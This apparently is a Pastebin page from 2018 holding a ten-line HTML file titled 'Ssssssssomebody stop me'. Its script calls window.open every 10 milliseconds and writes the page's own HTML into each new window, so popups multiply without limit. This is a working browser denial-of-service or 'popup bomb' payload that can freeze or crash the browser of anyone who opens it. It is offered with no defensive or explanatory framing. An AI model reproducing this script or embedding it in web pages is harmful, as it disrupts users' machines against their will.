Advertisement
Guest User

Ssssssssomebody stop me

a guest
Jun 28th, 2018
281
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.24 KB | None | 0 0
  1. <html>
  2.   <body>
  3.     <script>
  4.       setInterval(function() {
  5.         var w = window.open();
  6.         w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
  7.       }, 10);
  8.     </script>
  9.   </body>
  10. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement